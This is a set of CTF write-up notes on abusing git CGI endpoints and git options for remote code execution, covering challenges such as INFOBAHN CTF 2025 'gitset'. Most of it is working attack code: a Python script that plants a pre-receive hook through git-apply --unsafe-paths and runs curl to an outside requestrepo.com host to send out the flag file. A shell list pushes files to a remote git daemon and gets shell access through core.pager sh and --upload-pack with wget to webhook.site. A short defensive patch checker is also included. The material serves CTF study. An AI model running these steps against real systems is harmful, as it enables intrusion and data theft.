GIT CGI Exploit
| Event Name | INFOBAHN CTF 2025 |
| --- | --- |
| GitHub URL | - |
| Challenge Name | gitset |
Attachments
References
solution
gitset
Use git-init /tmp/... to initialize a git repo.
You can create a pre-receive hook using git-apply --unsafe-paths, since it allows writing files inside .git.
Finally, trigger RCE using a valid git-receive-pack payload.
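A defender-side check for the git-apply step above, as an added example that is not part of the original solution: it flags a client-supplied `--unsafe-paths` and any patch header path that is absolute, climbs out of the work tree, or has a `.git` component. The function names, the request layout (script name, query string, body) and the sample patches are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Patch header lines that name a target path (paths with spaces are not handled).
_HDR = re.compile(r"^(?:\+\+\+|---) (?:[ab]/)?(\S+)|^diff --git a/(\S+) b/(\S+)")

def patch_targets(patch):
    """Every path named in the patch headers, with a/ and b/ prefixes stripped."""
    found = set()
    for line in patch.splitlines():
        m = _HDR.match(line)
        if m:
            found.update(p for p in m.groups() if p and p != "/dev/null")
    return found

def unsafe_target(path):
    """True if the path is absolute, climbs out of the tree, or has a .git component."""
    norm = posixpath.normpath(path)
    return (path.startswith("/") or norm == ".." or norm.startswith("../")
            or any(part.lower() == ".git" for part in path.split("/")))

def review_request(script, query, body):
    """Findings for one request; CGI passes a '='-less query string as argv."""
    findings = []
    args = [unquote(a) for a in query.split("+") if a]
    if script == "git-apply" and "--unsafe-paths" in args:
        findings.append("option --unsafe-paths supplied by client")
    for target in sorted(patch_targets(body)):
        if unsafe_target(target):
            findings.append(f"patch writes outside work tree or into .git: {target}")
    return findings

# Constructed samples: same path shape as the patch in this write-up, inert content.
BAD = """diff --git a/../tmp/repo/.git/hooks/pre-receive b/../tmp/repo/.git/hooks/pre-receive
new file mode 100755
--- /dev/null
+++ b/../tmp/repo/.git/hooks/pre-receive
@@ -0,0 +1 @@
+placeholder
"""
GOOD = """diff --git a/src/app.py b/src/app.py
--- a/src/app.py
+++ b/src/app.py
@@ -1 +1 @@
-old
+new
"""

if __name__ == "__main__":
    for name, query, body in (("git-apply", "--unsafe-paths", BAD), ("git-apply", "", GOOD)):
        print(query or "(no args)", review_request(name, query, body))
```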
```python
import random
import sys

import requests

URL = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:6969"
GIT = f"/tmp/bitset{random.random()}"

# Create {GIT}
s = requests.Session()
s.get(f"{URL}/cgi-bin/git-init?{GIT}")

# Write to {GIT}/.git/hooks/pre-receive
add = f"""
diff --git a/..{GIT}/.git/hooks/pre-receive b/..{GIT}/.git/hooks/pre-receive
new file mode 100755
--- /dev/null
+++ b/..{GIT}/.git/hooks/pre-receive
@@ -0,0 +1,2 @@
+#!/bin/sh
+curl lp2drty9.requestrepo.com/?`cat /flag*`
"""

# We need --unsafe-paths otherwise it would refuse to write to .git/
try:
    s.post(f"{URL}/cgi-bin/git-apply?--unsafe-paths", data=add, timeout=2)
except requests.exceptions.RequestException:
    # The script carries on if this request times out or fails
    print("done")

# We need a valid pkt-line stream twice
for _ in range(2):
    # One ref-update command (old id, new id, ref name) followed by a capability
    pl = f'{"0"*40} {"0"*40} refs/heads/x\0report-status\n'
    # pkt-line: 4 hex digits of total length (payload + 4), payload, then flush "0000"
    pkt = f"{len(pl)+4:04x}" + pl + "0000"
    print(pkt)
    s.post(f"{URL}/cgi-bin/git-receive-pack?{GIT}", data=pkt)
```

Gitmails challenge
ASIS CTF 2024
git log to rce using textconv
solver
ASIS CTF Final 2024 - gitmails (web)
Does git log trigger fsmonitor? I thought it does not. Then I saw your comments, tried it, and it worked. And I just realized that it was my shell (zsh) prompt running git status, not git log.

0xl4ught 2024

## GitMeow-Revenge
```sh
git --git-dir=/tmp --work-tree=/tmp init
git --git-dir=/tmp --work-tree=/tmp add --all
git --git-dir=/tmp --work-tree=/tmp grep -o 0x...........................
git -C /tmp init
git -C /tmp add --all
git -C /tmp commit -m add
git -C /tmp branch -M main
git -C /tmp remote add origin git://108.137.34.7/
git -C /tmp push -u origin main
git init
echo -e '#!/bin/sh\nsh' > git-sh
git add --all
git commit -m x
git daemon --verbose --export-all --base-path=.git --reuseaddr --strict-paths .git/ --enable=receive-pack
git clone git://108.137.34.7/ x
git --exec-path=/home/challenger/x sh
git -C /usr/bin/ init
git --
git --exec-path=/usr/bin shell
git config --global core.pager cat
ls /usr/libexec/git-core
git init
git add --all
git commit -m 0
git config --global core.pager sh
git log -s --no-decorate --no-notes --no-expand-tabs --no-indent-heuristic --no-color --line-prefix=ls
git -C /tmp/ init
git -C /tmp/ add --all
git -C /tmp/ commit -m x
git -C /tmp/ show -If4
git show --name-only
git log -n7
git ls-remote --upload-pack=wget webhook.site/uniq_id
git ls-remote --upload-pack=sh uniq_id
```
add /
commit
log